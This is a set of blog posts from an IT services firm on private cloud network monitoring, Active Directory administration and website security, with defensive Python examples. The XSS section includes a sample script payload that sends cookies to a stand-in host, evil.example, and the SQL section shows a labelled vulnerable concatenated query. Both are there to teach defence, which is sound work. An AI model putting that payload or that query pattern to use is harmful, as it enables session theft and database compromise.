Network Monitoring for the Private Cloud: A brief guide

3rd May 2018

Private Cloud Computing

‘Cloud computing’ as a concept has been around for over ten years. Until about five years ago, many businesses and not-for-profit organisations shunned the “cloud” because all they could see were the problems and challenges of implementing a cloud-first policy: insufficient processor performance, enormous hardware costs and slow Internet connections that made everyday use difficult.

However, today’s technology, with broadband Internet connections and fast, inexpensive servers, gives business and not-for-profit IT teams the opportunity to consume only the services and storage space they actually need, and to adjust these to meet current demand. For many small and medium-sized organisations, using a virtual server provided by a service provider opens up a wide range of possibilities for cost savings, improved performance and higher data security. The goal of such cloud solutions is a consolidated IT environment that absorbs fluctuations in demand effectively and makes the most of the available resources.

The public cloud concept presents a number of challenges for a company’s IT department. Data security and the fear of ‘handing over’ control of its systems are significant issues. If an IT department is used to protecting its systems with firewalls and to monitoring the availability, performance and capacity usage of its network infrastructure with a monitoring solution, both measures are much more difficult to implement in the cloud. Of course, all large public cloud providers claim they offer appropriate security mechanisms and control systems, but the user must rely on the provider to guarantee constant access and to maintain data security.

Because of the challenges and general nervousness around data security in public clouds, many IT teams are investigating the creation of a ‘private cloud’ as an alternative to the use of public cloud. Private clouds enable staff and applications to access IT resources as they are required, while the private computing centre or a private server in a large data centre is running in the background. All services and resources used in a private cloud are found in defined systems that are only accessible to the user and are protected from external access.

Private clouds offer many of the advantages of cloud computing while minimising the risks. Unlike many public clouds, the quality criteria for performance and availability in a private cloud can be customised, and compliance with these criteria can be monitored to make sure they are achieved.

Before moving to a private cloud, an IT department must consider the performance demands of individual applications and how usage varies over time. Long-term analysis, trends and peak loads can be identified through extensive network monitoring evaluations, and resource availability can then be planned according to demand. This is necessary to guarantee consistent IT performance across virtualised systems. However, a private cloud will only function if a fast, highly reliable network connects the physical servers. The entire network infrastructure must therefore be analysed in detail before setting up a private cloud. If this network does not satisfy the requirements for transmission speed and stability, the hardware or network connections must be upgraded.

Ultimately, even minor losses in transmission speed can lead to severe drops in performance. At Wanstor we recommend IT administrators use a comprehensive network monitoring solution such as PRTG Network Monitor when planning the private cloud. If an application (which usually equates to multiple virtualised servers) is going to be operated across multiple host servers (a cluster) in the private cloud, it will need to use Storage Area Networks (SANs), which convey data over the network as a central storage solution. This makes network performance monitoring even more important.

In the terminal-based setups of the 1980s, the failure of a central computer could paralyse an entire company. The same scenario could happen if systems in the cloud fail. Current developments show that the world has gone through a phase of widely distributed computing and storage power (each workstation had a ‘full-blown’ PC) and returned to centralised IT concepts. The data is located in the cloud, and end devices are becoming more streamlined. The new cloud therefore echoes the old mainframe concept of centralised IT. The failure of a single VM in a highly virtualised cloud environment can quickly interrupt access to 50 or 100 central applications. Modern clustering concepts are used to try to avoid these failures, but if a system fails despite these efforts, it must be dealt with immediately. If a host server crashes and pulls a large number of virtual machines down with it, or its network connection slows or is interrupted, every virtualised service on that host is instantly affected, something that even the best clustering concepts often cannot prevent.

A private cloud (like any other cloud) depends on the efficiency and dependability of the IT infrastructure. Physical or virtual server failures, connection interruptions and defective switches or routers can become expensive if they cause staff, automated production processes or online retailers to lose access to important operational IT functions.

This means a private cloud also presents new challenges to network monitoring. To make sure that users have constant access to remote business applications, the performance of the connection to the cloud must be monitored on every level and from every perspective.

At Wanstor we believe an appropriate network monitoring solution such as PRTG accomplishes all of this from a central system: it notifies the IT administrator immediately of possible disruptions within the private IT landscape, both on site and in the private cloud, even if the private cloud is run in an external computing centre. A characteristic of private cloud monitoring is that external monitoring services cannot ‘look into’ the cloud, precisely because it is private. The operator or client must therefore run a monitoring solution within the private cloud itself, and as a result the IT staff can monitor the private cloud more accurately and directly than a purchased service in the public cloud. A private cloud also allows unrestricted access when necessary, so the IT administrator can track the condition of all relevant systems directly with their own network monitoring solution. This encompasses monitoring of every individual virtual machine as well as the VMware host and all physical servers, firewalls, network connections and so on.

For comprehensive private cloud monitoring, the network monitoring should have the systems on the radar from user and server perspectives. If a company operates an extensive website with a web shop in a private cloud, for example, network monitoring could be set up as follows: A website operator aims to ensure that all functions are permanently available to all visitors, regardless of how this is realised technically. The following questions are especially relevant in this regard:


  • Is the website online?
  • Does the web server deliver the correct contents?
  • How fast does the site load?
  • Does the shopping cart process work?

These questions can only be answered if network monitoring takes place from outside the server in question. Ideally, network monitoring should be run outside the related computing centre, as well. It would therefore be suitable to set up a network monitoring solution on another cloud server or another computing centre.

It is crucial that all monitoring locations are reliable and that a failover cluster supports the monitoring itself, so that interruption-free monitoring is guaranteed. This remote monitoring should include the following (a minimal sketch of such an external check appears after the list):

  • Firewall, HTTP load balancer and Web server pinging
  • HTTP/HTTPS sensors
  • Monitoring loading time of the most important pages
  • Monitoring loading time of all assets of a page, including CSS, images, Flash, etc.
  • Checking whether pages contain specific words, e.g.: “Error”
  • Measuring loading time of downloads
  • HTTP transaction monitoring, for shopping process simulation
  • Sensors that monitor the remaining period of SSL certificate validity
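
To make these checks concrete, the sketch below shows the kind of external check a monitoring sensor performs: it times the loading of a page, looks for an error keyword in the content and reports the remaining validity of the TLS certificate. It is a minimal illustration in Python using the widely available requests library (the site name is hypothetical), not a replacement for a full monitoring product such as PRTG.

```python
import socket
import ssl
import time
from datetime import datetime, timezone

import requests

SITE = "https://www.example-shop.co.uk"   # hypothetical site under test
HOST = "www.example-shop.co.uk"

def check_site() -> None:
    # Loading time and content check for the most important page.
    start = time.monotonic()
    response = requests.get(SITE, timeout=15)
    elapsed = time.monotonic() - start
    print(f"HTTP {response.status_code} in {elapsed:.2f} seconds")
    if "Error" in response.text:
        print("WARNING: the page contains the word 'Error'")

    # Remaining validity period of the SSL/TLS certificate.
    context = ssl.create_default_context()
    with socket.create_connection((HOST, 443), timeout=15) as sock:
        with context.wrap_socket(sock, server_hostname=HOST) as tls:
            cert = tls.getpeercert()
    expires = datetime.fromtimestamp(ssl.cert_time_to_seconds(cert["notAfter"]), tz=timezone.utc)
    days_left = (expires - datetime.now(timezone.utc)).days
    print(f"Certificate expires in {days_left} days")

check_site()
```

A real monitoring platform runs checks like this on a schedule, from several locations, and feeds the results into its alerting and reporting engine.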

If one of these sensors finds a problem, the network monitoring solution should send a notification to the IT administrator. Rule-based monitoring is helpful here. If the Ping sensor for the firewall times out, for example, PRTG Network Monitor can pause all other sensors to avoid a flood of notifications, since in this case the connection to the private cloud has clearly been lost altogether.

Other questions that are crucial for monitoring the (virtual) servers operating in the private cloud include:

  • Does the virtual server run flawlessly?
  • Do the internal data replication and load balancer work?
  • How high are the CPU usage and memory consumption?
  • Is sufficient storage space available?
  • Do email and DNS servers function flawlessly?

These questions cannot be answered with external network monitoring. Monitoring software must either be running on the server itself, or the monitoring tool must be able to monitor the server using remote probes. Such probes monitor, for example, the following parameters on each (virtual) server that runs in the private cloud, as well as on the host servers:

  • CPU usage
  • Memory usage (page files, swap file, page faults, etc.)
  • Network traffic
  • Hard drive access, free disc space and read/write times during disc access
  • Low-level system parameters (e.g.: length of processor queue, context switches)
  • Web server’s HTTP response time

Critical processes, such as SQL servers or web servers, are often monitored individually, in particular for CPU and memory usage.

In addition, the firewall condition (bandwidth use, CPU) can be monitored. If one of these measured variables lies outside of a defined range (e.g. CPU usage over 95% for more than two or five minutes), the monitoring solution will send notifications to the IT administrator.
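
The sketch below illustrates the kind of data such a local probe gathers and how a simple threshold rule can be applied to it. It is a minimal Python example assuming the psutil library is installed; a real remote probe, such as those used by PRTG, reports its results back to a central server and only raises an alert when a threshold is breached for a sustained period.

```python
import psutil

# Illustrative thresholds; in practice these are tuned per host.
CPU_LIMIT_PERCENT = 95
MIN_FREE_DISK_GB = 10

def collect_and_check() -> list[str]:
    alerts = []
    cpu = psutil.cpu_percent(interval=5)        # CPU usage sampled over 5 seconds
    memory = psutil.virtual_memory()            # RAM usage; swap is available separately
    disk = psutil.disk_usage("/")               # free space on the system volume
    network = psutil.net_io_counters()          # cumulative traffic counters

    print(f"CPU {cpu:.0f}% | RAM {memory.percent:.0f}% | "
          f"free disk {disk.free / 1e9:.1f} GB | bytes sent {network.bytes_sent}")

    if cpu > CPU_LIMIT_PERCENT:
        alerts.append(f"CPU usage at {cpu:.0f}%")
    if disk.free / 1e9 < MIN_FREE_DISK_GB:
        alerts.append(f"Only {disk.free / 1e9:.1f} GB of disk space left")
    return alerts

for alert in collect_and_check():
    print("ALERT:", alert)   # a real probe would raise an email, SMS or push notification
```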

Final thoughts

With the increasing use of cloud computing, IT system administrators are facing new challenges. A private cloud depends on the efficiency and dependability of the IT infrastructure. This means that the IT department must look into the capacity requirements of each application in the planning stages of the cloud in order to calculate resources to meet the demand. The connection to the cloud must be extensively monitored, as it is vital that the user has constant access to all applications during operation.

At the same time, smooth operation of all systems and connections within the private cloud must be guaranteed. A network monitoring solution should therefore monitor all services and resources from every perspective. This ensures continuous system availability.

For more information about Wanstor and PRTG network monitoring tools please visit – https://www.wanstor.com/paessler-prtg-network-monitor.htm


Overcoming Active Directory Administrator Challenges

23rd February 2018

The central role of Active Directory in business environments

Deployment of and reliance upon Active Directory in the enterprise continues to grow at a rapid pace, and the directory is increasingly becoming the central store for sensitive user data as well as the gateway to critical business information. It provides businesses with a consolidated, integrated and distributed directory service, and enables them to better manage user and administrative access to business applications and services.

Over the past 10+ years, Wanstor has seen Active Directory’s role in the enterprise expand drastically, as has the need to secure the data it both stores and enables access to. Unfortunately, native Active Directory administration tools provide little control over user and administrative permissions and access. This lack of control makes the secure administration of Active Directory a challenging task for IT administrators. In addition to the limited control over what users and administrators can do within Active Directory, the directory offers only limited reporting on the activities performed within it. This makes it very difficult to meet audit requirements and to secure Active Directory. As a result, many businesses need assistance in creating repeatable, enforceable processes that will reduce their administrative overhead while helping to increase the availability and security of their systems.

Because Active Directory is an essential part of the IT infrastructure, IT teams must manage it both thoughtfully and diligently – controlling it, securing it and auditing it. Not surprisingly, with an application of this importance there are challenges to confront and resolve in reducing risk, whilst deriving maximum value for the business. This blog will examine some of the most challenging administrative tasks related to Active Directory.

Compliance Auditing and Reporting

To satisfy audit requirements, businesses must demonstrate control over the security of sensitive and business-critical data. However, without additional tools, demonstrating regulatory compliance with Active Directory is time-consuming, tedious and complex.

Auditors and stakeholders require detailed information about privileged-user activity. This level of granular information allows interested parties to troubleshoot problems and also provides information necessary to improve the performance and availability of Active Directory.

Auditing and reporting on Active Directory has always been a challenge. To more easily achieve, demonstrate and maintain compliance, businesses should employ a solution that provides robust, custom reporting and auditing capabilities. Reporting should provide information on what, when and where changes happen, and who made the changes.

Reporting capabilities should be flexible enough to provide graphical trend information for business stakeholders, while also providing granular detail necessary for administrators to improve their Active Directory deployment. Solutions should also securely store audit events for as long as necessary to meet data retention requirements and enable the easy search of these events.

Group Policy Management

Microsoft recommends that Group Policy be a cornerstone of Active Directory security. Leveraging the powerful capabilities of Group Policy, IT teams can manage and configure user and asset settings, applications and operating systems from a central console. It is an indispensable resource for managing user access, permissions and security settings in the Windows environment.

However, maintaining a large number of Group Policy Objects (GPOs), which store policy settings, can be a challenging task. For example, administrators should take special care in large IT environments with many system administrators, because changes to GPOs can affect every computer or user in a domain in real time. Group Policy also lacks true change-management and version-control capabilities. Due to the limited native controls available, accomplishing something as simple as deploying a shortcut requires writing a script. Custom scripts are often complex to create and difficult to debug and test. If a script fails or causes disruption in the live environment, there is no way to roll back to the last known setting or configuration. Malicious or unintended changes to Group Policy can have devastating and permanent effects on an IT environment and a business.

To prevent Group Policy changes that can negatively impact the business, IT teams often restrict administrative privilege to a few highly-skilled administrators. As a result, these staff members are overburdened with administering Group Policy rather than supporting the greater goals of the business. To leverage the powerful capabilities of Group Policy, it is necessary to have a solution in place that provides a secure offline repository to model and predict the impact of Group Policy changes before they go live. The ability to plan, control and troubleshoot Group Policy changes, with an approved change and release-management process, enables IT teams to improve the security and compliance of their Windows environment without making business-crippling administrative errors.

Businesses should also employ a solution for managing Group Policy that enables easy and flexible reporting to demonstrate that they’ve met audit requirements.

User Provisioning, Re-provisioning and De-provisioning

Most employees require access to several systems and applications, and each programme has its own account and login information. Even with today’s more advanced processes and systems, employees often find themselves waiting for days for access to the systems they need. This can cost businesses thousands of pounds in lost productivity and employee downtime.

To minimise workloads and expedite the provisioning process, many businesses treat Active Directory as the authoritative data store for managing user account information and access rights to IT resources and assets. Provisioning, re-provisioning and de-provisioning access via Active Directory is often a manual process. In a large business, maintaining appropriate user permissions and access can be a time-consuming activity, especially when the business has significant personnel turnover. Systems administrators often spend hours creating, modifying and removing credentials. In a large, complex business, manual provisioning can take days. There are no automation or policy-enforcement capabilities native to Active Directory. With so little control in place, there is no way to make sure that users will receive the access they need when they need it.

Additionally, there is no system of checks and balances. Administrative errors can easily result in elevated user privileges that can lead to security breaches, malicious activity or unintended errors that can expose the business to significant risk. Businesses should look for an automated solution to execute provisioning activities. Implementing an automated solution with approval capabilities greatly reduces the burden on administrators, improves adherence to security policies, improves standards and decreases the time a user must wait for access. It also speeds up the removal of user access, which minimizes the ability of a user with malicious intent to access sensitive data.
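
As an illustration of what the directory-update step of such automation looks like, the hedged sketch below uses Python with the ldap3 library to create and disable user accounts. The domain controller, service account and OU names are hypothetical, and a real provisioning workflow would wrap calls like these in approval, logging, group-membership and password-handling steps (setting a password requires LDAPS and the special unicodePwd attribute).

```python
from ldap3 import Connection, Server, MODIFY_REPLACE

# Hypothetical domain controller, service account and OU.
server = Server("ldaps://dc01.corp.example.local")
conn = Connection(server, user="CORP\\svc-provision", password="change-me", auto_bind=True)

BASE_OU = "OU=Staff,DC=corp,DC=example,DC=local"

def provision_user(first: str, last: str, account: str) -> bool:
    # Creates the account object; it stays disabled until a password is set separately.
    dn = f"CN={first} {last},{BASE_OU}"
    return conn.add(dn,
                    object_class=["top", "person", "organizationalPerson", "user"],
                    attributes={"givenName": first,
                                "sn": last,
                                "sAMAccountName": account,
                                "userPrincipalName": f"{account}@corp.example.local"})

def deprovision_user(first: str, last: str) -> bool:
    # 514 = normal account with the ACCOUNTDISABLE flag; disabling is usually safer than deleting.
    dn = f"CN={first} {last},{BASE_OU}"
    return conn.modify(dn, {"userAccountControl": [(MODIFY_REPLACE, [514])]})
```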

Secure Delegation of User Privilege

Reducing the number of users with elevated administrative privileges is a constant challenge for the owners of Active Directory. Many user and helpdesk requests require interaction with Active Directory, but these common interactions often result in elevated access for users who do not need it to perform their jobs. Because there are only two levels of administrative access in Active Directory (Domain Administrator or Enterprise Administrator), it is very difficult to control what users can see and do once they gain administrative privileges.

Once a user has access to powerful administrative capabilities, they can easily access sensitive business and user information, elevate their privileges and even make changes within Active Directory. Elevated administrative privileges, especially when in the hands of someone with malicious intent, dramatically increase the risk exposure of Active Directory and the applications, users and systems that rely upon it. At Wanstor we have found through our years of experience of dealing with Active Directory that it is not uncommon for a business to discover that thousands of users have elevated administrative privileges. Each user with unauthorized administrative privileges presents a unique threat to the security of the IT infrastructure and business. Coupled with Active Directory’s latent vulnerabilities, it is easy for someone to make business-crippling administrative changes. When this occurs, troubleshooting becomes difficult, as auditing and reporting limitations make it nearly impossible to quickly gather a clear picture of the problem.

To reduce the risk associated with elevated user privilege and make sure that users only have access to the information they require, businesses should seek a solution that can securely delegate entitlements. This is a requirement to meet separation-of-duties mandates, as well as a way to share the administrative load by securely delegating privileges to subordinates.

Change Auditing and Monitoring

To achieve and maintain a secure and compliant IT environment, IT administrators must control change and monitor for unauthorized changes that may negatively impact their business. Active Directory change auditing is an important procedure for identifying and limiting errors and unauthorized changes to Active Directory configuration. One single change can put a business at risk, introducing security breaches and compliance issues.

Native Active Directory tools fail to proactively track, audit, report and alert administrators about vital configuration changes. Additionally, native real-time auditing and reporting on configuration changes, day-to-day operational changes and critical group changes do not exist. This exposes the business to risk, as the IT team’s ability to correct and limit damage is dependent on their ability to detect and troubleshoot a change once it has occurred.

A change that goes undetected can have a drastic impact on a business. For example, someone who elevated their privileges and changed their identity to that of a senior member of the finance department could potentially access company funds, resulting in theft, fraudulent wire transfers and so forth. To reduce risk and help prevent security breaches, businesses should employ a solution that provides comprehensive change monitoring. This solution should include real-time change detection, intelligent notification, human-readable events, central auditing and detailed reporting. Employing a solution that encompasses all of these elements will enable IT teams to quickly and easily identify unauthorized changes, pinpoint their source and resolve issues before they negatively impact the business.

Maintaining Data Integrity

It is important for businesses of all sizes to make sure that the data housed within Active Directory supports the needs of the business, especially as other applications rely on Active Directory for content and information.

Data integrity involves both the consistency of data and the completeness of information. For example, there are multiple ways to enter a phone number. Entering data in inconsistent formats creates data pollution. Data pollution inhibits the business from efficiently organizing and accessing important information. Another example of data inconsistency is the ability to abbreviate a department name. Think of the various ways to abbreviate “Accounting.” If there are inconsistencies in Active Directory’s data, there is no way to make sure that an administrator can group all the members of accounting together, which is necessary for payroll, communications, systems access and so on.

Another vital aspect of data integrity when working with Active Directory is the completeness of information. Active Directory provides no control over content that is entered natively. If no controls are in place, administrators can enter information in any format they wish and leave fields that the business relies upon blank.

To support and provide trustworthy information to all aspects of the business that rely on Active Directory, businesses should employ a solution that controls both the format and completeness of data entered in Active Directory. By putting these controls in place, IT teams can drastically reduce data pollution and significantly improve the uniformity and completeness of the content in Active Directory.
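
A small illustration of the kind of control meant here: before an attribute is written to the directory, a script or provisioning tool can normalise it to a single canonical format and reject values that are not on an approved list. The Python sketch below is minimal, and the formats and department names are hypothetical.

```python
import re

# Hypothetical canonical department names and the variants people actually type.
DEPARTMENT_ALIASES = {
    "acct": "Accounting", "accts": "Accounting", "accounting": "Accounting",
    "hr": "Human Resources", "human resources": "Human Resources",
}

def normalise_phone(raw: str) -> str:
    # Strip spaces, dashes and brackets so every number is stored in one format.
    return re.sub(r"[^\d+]", "", raw)

def normalise_department(raw: str) -> str:
    key = raw.strip().lower().rstrip(".")
    if key not in DEPARTMENT_ALIASES:
        raise ValueError(f"'{raw}' is not an approved department name")
    return DEPARTMENT_ALIASES[key]

print(normalise_phone("020 7592-7860"))   # -> 02075927860
print(normalise_department("Acct."))      # -> Accounting
```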

Self-Service Administration

Most requests made by the business or by users require access to and administration of Active Directory. This is often manual work and there are few controls in place to prevent administrative errors. Active Directory’s inherent complexity makes these errors common, and just one mistake could do damage to the entire security infrastructure. With the lack of controls, the business cannot have just anyone administering Active Directory.

While it may be practical to employ engineers and consultants to install and maintain Active Directory, businesses cannot afford to have their highly-skilled and valuable employees spending the majority of their time responding to relatively trivial user requests. Self-service administration and automation are logical solutions for businesses looking to streamline operations, become more efficient and improve compliance. This is achieved by placing controls around common administrative tasks and enabling the system to perform user requests without tasking highly skilled administrators.

Businesses should identify processes that are routine yet hands-on, and consider solutions that provide user self-service and automation of those processes. Automating these processes reduces the workload on highly-skilled administrators; it also improves compliance with policies, since automation does not allow users to skip steps in the process. Businesses should also look for self-service and automation solutions that allow for approval and provide a comprehensive audit trail of events to help demonstrate policy compliance.

Final thoughts

Active Directory has found its home as a mission-critical component of the IT infrastructure. As businesses continue to leverage it for its powerful capabilities as a commanding repository, Active Directory is a vital part of enterprise security. Therefore, administrators must be able to control, monitor, administer and protect it with the same degree of discipline currently applied to other high-profile information such as credit card data, customer data and so forth. Because native tools do not enable or support the secure and disciplined administration of Active Directory, businesses must look for solutions that enable its controlled and efficient administration. These solutions help make sure the business information housed in Active Directory is both secure and appropriately serving the needs of the business.


A blog on Website Security

22nd February 2018

At Wanstor this week, we have been discussing website security. This is because of news that the Information Commissioner’s Office (ICO) had to take its website down after a warning that hackers were taking control of visitors’ computers to mine cryptocurrency.

Following this story, some of our customers have been in contact regarding website security and suggested best practices. In light of this, Wanstor’s security experts have come together to develop the following high level guide to website security.

You may not think your website has anything worth hacking, but corporate websites are compromised all the time. Despite what people think, the majority of website security breaches are not carried out to steal data or deface a website. Instead, compromised servers are used as an email relay for spam, or to set up a temporary web server, normally to serve files of an illegal nature. Other common ways to abuse compromised machines include using your company servers as part of a botnet, or to mine for Bitcoins. You could even be hit by ransomware. Hacking is regularly performed by automated scripts written to scour the Internet in an attempt to exploit known website security issues in software. By following the tips below, your website should be able to operate more safely and deter hackers and the automated tools they use.

Keep software updated

It may seem obvious, but making sure you keep all software updated is vital to keeping your site secure. This applies both to the server operating system and to any software you may be running on your website, such as a CMS or forum. When security holes are found in software, hackers are quick to attempt to abuse them. If you are using a managed hosting solution, then your hosting company should take care of any updates, so you do not need to worry about this, unless your hosting company contacts you to tell you to worry!

If you are using third-party software on your website, such as a CMS or forum, you should make sure you are quick to apply any security patches. Most vendors have a mailing list or RSS feed detailing any website security issues. Many developers use tools like Composer, npm, or RubyGems to manage their software dependencies, and a security vulnerability appearing in a package you depend upon but are not paying attention to is one of the easiest ways to get caught out. Make sure you keep your dependencies up to date and use relevant tools to get automatic notifications when a vulnerability is announced in one of your components.

SQL injection

SQL injection attacks occur when attackers use a web form field or URL parameter to gain access to or manipulate your database. When you use standard Transact SQL, it is easy for such individuals to insert rogue code into your query that could be used to change tables, retrieve information and delete data. You can easily prevent this by always using parameterised queries – most web languages have this feature and it is easy to implement.
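
The contrast below shows the difference in Python, using the standard sqlite3 module purely as an illustration (the database, table and column names are hypothetical); the same pattern applies to any database driver.

```python
import sqlite3

conn = sqlite3.connect("shop.db")   # hypothetical database

def find_user_unsafe(email: str):
    # VULNERABLE: the input is concatenated straight into the SQL text.
    query = "SELECT id, name FROM users WHERE email = '" + email + "'"
    return conn.execute(query).fetchall()

def find_user_safe(email: str):
    # SAFE: the value is passed as a bound parameter and is never treated as SQL.
    return conn.execute("SELECT id, name FROM users WHERE email = ?", (email,)).fetchall()
```

In the first function, crafted input can change the meaning of the query; in the second, whatever the user types is only ever treated as a literal value.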

XSS

Cross-site scripting (XSS) attacks inject malicious JavaScript into your pages, which then runs in the browsers of your users, allowing page content to be modified or information to be stolen or transmitted to the attacker. For example, if you show comments on a page without validation, attackers might submit comments containing script tags and JavaScript, which could run in every other user’s browser and steal their login cookie, allowing the attacker to take control of accounts owned by each user who views the comment. You need to ensure that users cannot inject active JavaScript content into your pages.

The key here is to focus on how your user-generated content could escape the bounds you expect and be interpreted by the browser as something other than what you intended. This is similar to defending against SQL injection. When dynamically generating HTML, use functions which explicitly make the changes you’re looking for, or use functions in your templating tool that automatically ensure appropriate escaping, rather than concatenating strings or setting raw HTML content.
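
As a minimal illustration of output escaping, the Python sketch below uses the standard library’s html.escape before user-generated content is placed into a page; most templating engines (Jinja2, Razor, Twig and so on) can do this automatically.

```python
from html import escape

def render_comment(comment: str) -> str:
    # escape() turns <, >, & and quotes into HTML entities, so a submitted
    # <script> tag is displayed as text rather than executed in the browser.
    return '<li class="comment">' + escape(comment, quote=True) + "</li>"

print(render_comment('<script>new Image().src="https://evil.example/?c=" + document.cookie;</script>'))
```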

Another powerful tool in the XSS defender’s toolbox is Content Security Policy (CSP). CSP is a header your server can return which tells the browser to limit how and what JavaScript is executed in the page, for example disallowing any scripts not hosted on your domain and disallowing inline JavaScript. Mozilla has an excellent guide with some example configurations. This makes it harder for an attacker’s scripts to work, even if they can get them into your page.
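
As an example of returning such a header, the sketch below assumes a Python Flask application; the policy string itself is a deliberately simple starting point and would need tailoring to the scripts and assets your site actually uses.

```python
from flask import Flask

app = Flask(__name__)

@app.after_request
def add_csp_header(response):
    # Allow scripts and other resources only from our own origin; inline JavaScript is blocked.
    response.headers["Content-Security-Policy"] = "default-src 'self'; script-src 'self'"
    return response
```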

Error messages

Be careful with how much information you give away in error messages. Provide only minimal errors to your users, to make sure they do not leak secrets present on your server. Although tempting, do not provide full exception details either, as these can make complex attacks like SQL injection far easier. Keep detailed errors in your server logs, and show users only the information they need to see.
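
A minimal sketch of this pattern, assuming a Python Flask application: the full exception goes to the server log, while the visitor only ever sees a generic message.

```python
import logging
from flask import Flask

app = Flask(__name__)
logging.basicConfig(filename="app-errors.log", level=logging.ERROR)

@app.errorhandler(Exception)
def handle_unexpected_error(exc):
    # Full details, including the stack trace, stay in the server log...
    app.logger.error("Unhandled error", exc_info=exc)
    # ...while the visitor only sees a deliberately vague message.
    return "Sorry, something went wrong. Please try again later.", 500
```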

Server side validation

Validation should always be done both in the browser and on the server side. The browser can catch simple failures, such as mandatory fields that are left empty or text entered into a numbers-only field. These checks can, however, be bypassed, so you should make sure you repeat them, along with deeper validation, on the server side; failing to do so could allow malicious or scripted content to be inserted into the database, or could cause undesirable results in your website.
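
The sketch below shows what repeating those checks on the server might look like in Python; the field names and rules are hypothetical and would mirror whatever the browser-side validation enforces.

```python
import re

def validate_order_form(form: dict) -> list[str]:
    # Repeat on the server every check the browser was supposed to have made.
    errors = []
    if not form.get("name", "").strip():
        errors.append("Name is required.")
    if not re.fullmatch(r"[^@\s]+@[^@\s]+\.[^@\s]+", form.get("email", "")):
        errors.append("Email address is not valid.")
    if not re.fullmatch(r"\d+", form.get("quantity", "")):
        errors.append("Quantity must be a whole number.")
    return errors

print(validate_order_form({"name": "", "email": "not-an-email", "quantity": "two"}))
```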

Passwords

Everyone knows they should use complex passwords, but that doesn’t mean they always do. It is crucial to use strong passwords for your server and website admin area, but it is equally important to insist on good password practices for your users to protect the security of their accounts. As much as users may not like it, enforcing password requirements such as a minimum of around eight characters, including an uppercase letter and a number, will help to protect their information in the long run. Passwords should always be stored as hashed values, preferably using a salted one-way hashing algorithm. Using this method means that when you are authenticating users you are only ever comparing hashed values.

In the event of someone hacking in and stealing your passwords, storing them as hashes helps limit the damage, as they cannot simply be decrypted. The best an attacker can do is a dictionary attack or brute-force attack, essentially guessing every combination until a match is found.
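
As an illustration, the Python sketch below uses the standard library’s PBKDF2 implementation with a random salt per user; dedicated schemes such as bcrypt, scrypt or Argon2 are also common choices.

```python
import hashlib
import hmac
import os

ITERATIONS = 200_000   # deliberately slow, to make brute-force attacks expensive

def hash_password(password: str) -> tuple[bytes, bytes]:
    # A random salt per user defeats precomputed (rainbow-table) attacks.
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest

def verify_password(password: str, salt: bytes, stored_digest: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    # compare_digest avoids leaking information through timing differences.
    return hmac.compare_digest(candidate, stored_digest)

salt, digest = hash_password("CorrectHorseBatteryStaple1")
print(verify_password("CorrectHorseBatteryStaple1", salt, digest))   # True
```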

Thankfully, many CMSs provide user management out of the box, with a lot of these website security features built in, although some configuration or extra modules might be required to set the minimum password strength. If you are using .NET then it is worth using membership providers, as they are very configurable, provide inbuilt website security and include ready-made controls for login and password reset.

File uploads

Allowing users to upload files to your website can be a significant website security risk, even if it’s simply to change their photo, background picture or avatar. The risk is that any file uploaded, however innocent it may look, could contain a script that, when executed on your server, completely opens up your website. If you have a file upload form then you need to treat all files with great suspicion. If you are allowing users to upload images, you cannot rely on the file extension or the MIME type to verify that the file is an image, as these can easily be faked. Even opening the file and reading the header, or using functions to check the image size, is not foolproof. Most image formats allow a comment section to be stored, which could contain PHP code that the server might execute.

So what can you do to prevent this? Ultimately you want to stop users from being able to execute any file they upload. By default, web servers won’t attempt to execute files with image extensions, but it isn’t recommended to rely solely on checking the file extension, as a file with the name image.jpg.php has been known to get through. Some options are to rename the file on upload to ensure the correct file extension, or to change the file permissions so it can’t be executed.

In Wanstor’s opinion, the recommended solution is to prevent direct access to uploaded files. This way, any files uploaded to your website are stored in a folder outside of the webroot or in the database as a blob. If your files are not directly accessible you will need to create a script to fetch the files from the private folder (or an HTTP handler in .NET) and deliver them to the browser. Image tags support an src attribute that is not a direct URL to an image, so your src attribute can point to your file delivery script providing you set the correct content type in the HTTP header.
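
A minimal sketch of this approach, assuming a Python Flask application: uploaded files are given a server-generated name, stored in a hypothetical folder outside the webroot and served back with a fixed, non-executable content type.

```python
import secrets
from pathlib import Path
from flask import Flask, abort, request, send_file

app = Flask(__name__)
UPLOAD_DIR = Path("/srv/private-uploads")   # hypothetical folder outside the webroot

@app.route("/avatar", methods=["POST"])
def upload_avatar():
    # Ignore the user-supplied filename completely and generate our own.
    token = secrets.token_hex(16)
    request.files["avatar"].save(UPLOAD_DIR / f"{token}.bin")
    return {"token": token}

@app.route("/files/<token>")
def serve_file(token: str):
    if not token.isalnum():             # rejects anything that could traverse directories
        abort(404)
    path = UPLOAD_DIR / f"{token}.bin"
    if not path.is_file():
        abort(404)
    # A fixed, non-executable content type means the server never tries to run the file.
    return send_file(path, mimetype="application/octet-stream")
```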

The majority of hosting providers deal with the server configuration for you, but if you are hosting your website on your own server then there are a few things you will want to check. For example, make sure you have a firewall set up and are blocking all non-essential ports.

If you are allowing files to be uploaded from the Internet only use secure transport methods to your server such as SFTP or SSH. Where possible have your database running on a different server to that of your web server. Doing this means the database server cannot be accessed directly from the outside world, only your web server can access it, minimising the risk of your data being exposed. Finally, don’t forget about restricting physical access to your server.

HTTPS

HTTPS is a protocol used to provide security over the Internet. HTTPS guarantees to users that they’re communicating with the server they expect, and that nobody else can intercept or modify the content in transit. If you have anything that your users might want to remain private, it’s highly advisable to use only HTTPS to deliver it. That of course means credit card and login pages. A login form will often set a cookie, for example, which is sent with every other request to your site that a logged-in user makes and is used to authenticate those requests. An attacker stealing this cookie would be able to perfectly imitate a user and take over their login session. To defeat these kinds of attacks, you almost always want to use HTTPS for your entire site.
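
As an illustration of the application-side pieces of this, the sketch below assumes a Python Flask application sitting behind a correctly configured TLS certificate: it redirects plain HTTP requests, marks the session cookie as Secure and HttpOnly, and sets an HSTS header.

```python
from flask import Flask, redirect, request

app = Flask(__name__)
# Send the session cookie only over HTTPS and keep it out of reach of JavaScript.
app.config.update(SESSION_COOKIE_SECURE=True, SESSION_COOKIE_HTTPONLY=True)

@app.before_request
def force_https():
    # Redirect any plain-HTTP request to its HTTPS equivalent.
    if not request.is_secure:
        return redirect(request.url.replace("http://", "https://", 1), code=301)

@app.after_request
def add_hsts_header(response):
    # Tell browsers to insist on HTTPS for this site for the next year.
    response.headers["Strict-Transport-Security"] = "max-age=31536000; includeSubDomains"
    return response
```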

